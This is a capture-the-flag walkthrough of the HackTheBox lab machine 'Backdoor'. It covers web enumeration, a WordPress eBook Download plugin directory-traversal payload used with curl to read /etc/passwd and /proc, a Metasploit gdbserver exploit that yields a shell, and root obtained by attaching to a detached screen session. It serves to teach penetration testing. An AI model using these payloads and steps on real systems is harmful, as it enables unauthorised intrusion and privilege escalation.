Backdoor from HackTheBox — Detailed Walkthrough
Showing all the tools and techniques needed to complete the box.
Machine Information
Backdoor is an easy machine on HackTheBox. We start by finding a basic WordPress site with a vulnerable plugin. This allows directory traversal and local file inclusion, which we use to leak data and spy on processes. From this we find a vulnerable version of gdbserver which we exploit using Meterpreter to get a reverse shell. From there we find a detached screen session that we connect to and gain root.
Skills required are web and OS enumeration. Skills learned are finding and exploiting vulnerable software.
Initial Recon
As always let’s start with Nmap:
Three ports found initially. 1337 looks interesting as that’s a little unusual, however let’s start with Apache on port 80. First add the server IP to my hosts file:
┌──(root💀kali)-[~/htb/backdoor]
└─# echo "10.10.11.125 backdoor.htb" >> /etc/hosts
WordPress
We find a basic WordPress site:
There’s no content here, let’s look for subfolders:
┌──(root💀kali)-[~/htb/backdoor]
└─# gobuster dir -u http://backdoor.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/08 22:13:41 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
/wp-admin (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]
/wp-includes (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/12/08 22:15:21 Finished
===============================================================
From those subfolders the interesting one is wp-content, let’s check that one out:
┌──(root💀kali)-[~/htb/backdoor]
└─# gobuster dir -u http://backdoor.htb/wp-content -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb/wp-content
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/08 22:16:12 Starting gobuster in directory enumeration mode
===============================================================
/plugins (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/plugins/]
/themes (Status: 301) [Size: 324] [--> http://backdoor.htb/wp-content/themes/]
/uploads (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/uploads/]
/upgrade (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/upgrade/]
===============================================================
2021/12/08 22:17:50 Finished
===============================================================
Looking in plugins we find this:
Searchsploit
Searchsploit gives us something useful:
Let’s check it out:
┌──(root💀kali)-[~/htb/backdoor]
└─# searchsploit -m php/webapps/39575.txt
Exploit: WordPress Plugin eBook Download 1.1 - Directory Traversal
URL: https://www.exploit-db.com/exploits/39575
Path: /usr/share/exploitdb/exploits/php/webapps/39575.txt
File Type: ASCII text
Copied to: /root/39575.txt
┌──(root💀kali)-[~/htb/backdoor]
└─# cat 39575.txt
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
Exploiting Plugin
So we have simple directory traversal and local file inclusion (LFI) vulnerabilities. Let’s try the example given above:
That works, let’s grab passwd:
┌──(root💀kali)-[~/htb/backdoor]
└─# curl http://backdoor.htb//wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
<SNIP>
user:x:1000:1000:user:/home/user:/bin/bash
Spying On Processes
That also works and we see just root and user as accounts we might be interested in.
In the earlier nmap scan we saw port 1337 was open. With the ability to read arbitrary files we can check out /proc and see what processes are running on the box. This explains more on how the /proc pseudo-filesystem works.
I used a simple loop to incrementally check /proc:
We find two interesting things. Port 1337 is running gdbserver, which is our path to getting a foothold. We can also see screen is running with a detached session, we’ll come back to that later.
Meterpreter
A quick search for gdb exploits found this article for a Metasploit method. Let’s try that:
We have a session connected, now start a shell:
meterpreter > shell
Process 2402 created.
Channel 1 created.
python3 -c "import pty;pty.spawn('/bin/bash')"
user@Backdoor:~$
User Flag
With our shell stabilised let’s grab the user flag:
user@Backdoor:~$ id
id
uid=1000(user) gid=1000(user) groups=1000(user)
user@Backdoor:~$ ls -l
-rw-r----- 1 root user 33 Dec 9 23:17 user.txt
user@Backdoor:~$ cat user.txt
<HIDDEN>
Privilege Escalation
The path to root is simple, but only if you paid attention earlier. When we scanned the processes running on the box remotely we saw this:
/proc/814/cmdline/proc/814/cmdline/proc/814/cmdline/bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
This shows us that screen is running with a session detached called root. So it’s pretty safe to assume we just need to attach to that screen to get our root shell.
This explains what screen is and the parameters it uses, these are the ones we can see are in use:
-d -m Start screen in "detached" mode. This creates a new session but doesn't attach to it. This is useful for system startup scripts.
-S sessionname
So this is nice and simple:
user@Backdoor:~$ /usr/bin/screen -x root/root
/usr/bin/screen -x root/root
Please set a terminal type.
Set terminal and then try again:
user@Backdoor:~$ export TERM=xterm
export TERM=xterm
user@Backdoor:~$ /usr/bin/screen -x root/root
/usr/bin/screen -x root/root
root@Backdoor:~#
Root Flag
And there we are, let’s grab that root flag:
root@Backdoor:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Backdoor:~# ls -l
-rw-r--r-- 1 root root 33 Dec 9 23:17 root.txt
root@Backdoor:~# cat root.txt
<HIDDEN>
All done. See you next time.
Twitter — https://twitter.com/pencer_io
Website — https://pencer.io
Originally published at https://pencer.io on April 26, 2022.